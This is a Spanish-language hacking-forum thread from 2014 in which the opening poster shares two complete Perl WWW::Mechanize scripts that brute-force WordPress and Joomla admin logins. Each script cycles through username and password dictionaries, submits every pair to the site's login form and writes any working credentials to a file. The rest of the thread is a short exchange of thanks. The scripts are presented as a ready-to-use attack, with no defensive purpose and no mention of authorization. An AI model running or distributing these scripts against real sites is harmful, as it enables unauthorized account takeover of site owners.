elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Fuerza bruta a login Wordpress y Joomla con Perl Mechanize		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Fuerza bruta a login Wordpress y Joomla con Perl Mechanize  (Leído 4,953 veces)
manudg

Desconectado Desconectado

Mensajes: 10


Ver Perfil WWW
Fuerza bruta a login Wordpress y Joomla con Perl Mechanize
« en: 23 Junio 2014, 23:42 pm »
Pequeño tutorial de como construir scripts con Perl para explotar los formularios de login de Wordpress y Joomla mediante fuerza bruta.

wordpress-login.pl

Código
  1. #!c:/strawberry/perl/bin/perl.exe
  2.  
  3. #Evitar caracteres extraños en la consola de windows
  4. binmode(STDOUT, ":encoding(cp850)");
  5. binmode(STDIN, ":encoding(cp850)");
  6.  
  7. use WWW::Mechanize;
  8. use strict;
  9.  
  10. #parámetros para el script
  11. my $url = $ARGV[0];
  12. my $admin = $ARGV[1];
  13. my $password = $ARGV[2];
  14. my $reporte = $ARGV[3];
  15.  
  16. if (!@ARGV)
  17.     {
  18. 	 print "wordpress-login.pl <url> <admin> <password> opcional<reporte>";
  19. 	}
  20. else 
  21.     {
  22. 	  my $mechanize = WWW::Mechanize->new();
  23. 	  #url de destino
  24. 	  $mechanize->get($url);
  25.  
  26. 	  #Abrir el diccionario para admin 
  27. 	  open(ADMIN, "<", $admin) || die("Error al abrir el diccionario para admin");
  28. 	  while(<ADMIN>)
  29. 	    {
  30. 		 my $adm = $_;
  31. 		 chomp($adm);
  32. 		 #Abrir el diccionario para password 
  33. 		 open(PASSWORD, "<", $password) || die("Error al abrir el diccionario para password");
  34. 		 while (<PASSWORD>)
  35. 		  {
  36. 		   chomp($_);
  37. 		   #Enviar el formulario
  38. 		   $mechanize->submit_form
  39. 		                  (
  40. 						     form_id => "loginform",
  41. 							 fields => {log => $adm, pwd => $_}
  42. 						   );
  43. 			print "$adm:$_\n";
  44. 			my $content = $mechanize->content;
  45. 			#comprobar el contenido 
  46. 			if ($content =~ /Bienvenido/ || $content =~ /Welcome/)
  47. 			  {
  48. 			  print "\n\n¡¡¡¡DATOS DE ACCESO!!!! $adm:$_\n\n";
  49. 			   if ($reporte)
  50. 			     {
  51. 				   open(REPORTE, ">", $reporte);
  52. 				   print REPORTE "¡¡¡¡DATOS DE ACCESO!!!! $adm:$_";
  53. 				   close(REPORTE);
  54. 				   print "####Datos guardados en $reporte####\n";
  55. 				 }
  56. 			   exit;
  57. 			  }
  58. 		  }
  59. 		  close(PASSWORD);
  60. 		}
  61. 		close(ADMIN);
  62. 	}
  63.  



joomla-login.pl

Código
  1. #!c:/strawberry/perl/bin/perl.exe
  2.  
  3. #Evitar caracteres extraños en la consola de windows
  4. binmode(STDOUT, ":encoding(cp850)");
  5. binmode(STDIN, ":encoding(cp850)");
  6.  
  7. use WWW::Mechanize;
  8. use strict;
  9.  
  10. #parámetros para el script
  11. my $url = $ARGV[0];
  12. my $admin = $ARGV[1];
  13. my $password = $ARGV[2];
  14. my $reporte = $ARGV[3];
  15.  
  16. if (!@ARGV)
  17.     {
  18. 	 print "joomla-login.pl <url> <admin> <password> opcional<reporte>";
  19. 	}
  20. else 
  21.     {
  22. 	  my $mechanize = WWW::Mechanize->new();
  23. 	  #url de destino
  24. 	  $mechanize->get($url);
  25.  
  26. 	  #Abrir el diccionario para admin 
  27. 	  open(ADMIN, "<", $admin) || die("Error al abrir el diccionario para admin");
  28. 	  while(<ADMIN>)
  29. 	    {
  30. 		 my $adm = $_;
  31. 		 chomp($adm);
  32. 		 #Abrir el diccionario para password 
  33. 		 open(PASSWORD, "<", $password) || die("Error al abrir el diccionario para password");
  34. 		 while (<PASSWORD>)
  35. 		  {
  36. 		   chomp($_);
  37. 		   #Enviar el formulario
  38. 		   $mechanize->submit_form
  39. 		                  (
  40. 						     form_id => "form-login",
  41. 							 fields => {username => $adm, passwd => $_}
  42. 						   );
  43. 			print "$adm:$_\n";
  44. 			my $content = $mechanize->content;
  45. 			#comprobar el contenido 
  46. 			if ($content =~ /Panel de Control/ || $content =~ /Control Panel/)
  47. 			  {
  48. 			  print "\n\n¡¡¡¡DATOS DE ACCESO!!!! $adm:$_\n\n";
  49. 			   if ($reporte)
  50. 			     {
  51. 				   open(REPORTE, ">", $reporte);
  52. 				   print REPORTE "¡¡¡¡DATOS DE ACCESO!!!! $adm:$_";
  53. 				   close(REPORTE);
  54. 				   print "####Datos guardados en $reporte####\n";
  55. 				 }
  56. 			   exit;
  57. 			  }
  58. 		  }
  59. 		  close(PASSWORD);
  60. 		}
  61. 		close(ADMIN);
  62. 	}
  63.  
En línea
.:UND3R:.
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.118


Ingeniería inversa / MASM


Ver Perfil WWW
Re: Fuerza bruta a login Wordpress y Joomla con Perl Mechanize
« Respuesta #1 en: 24 Junio 2014, 04:47 am »
Excelentes tutoriales, muchas gracias por compartirlos.
En línea

Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
manudg

Desconectado Desconectado

Mensajes: 10


Ver Perfil WWW
Re: Fuerza bruta a login Wordpress y Joomla con Perl Mechanize
« Respuesta #2 en: 25 Junio 2014, 13:06 pm »
No hay de que amigo :UND3R:, un placer compartilo en este gran foro, encuentro muchas cosas interesantes en este sitio, un saludo.  ;D
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Fuerza Bruta En VB
Programación Visual Basic 		Cicklow 6 7,881 Último mensaje 24 Agosto 2005, 22:51 pm
por 5v5
Fuerza bruta « 1 2 3 »
Programación Visual Basic 		vivachapas 25 13,657 Último mensaje 22 Enero 2008, 03:06 am
por vivachapas
Conseguir login por fuerza bruta con Medusa.
Hacking 		CloudswX 4 22,846 Último mensaje 3 Febrero 2014, 17:37 pm
por CloudswX
Joomla y Wordpress juntos pero no revueltos
Desarrollo Web 		Makinnon 4 2,537 Último mensaje 5 Marzo 2015, 04:37 am
por Makinnon
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines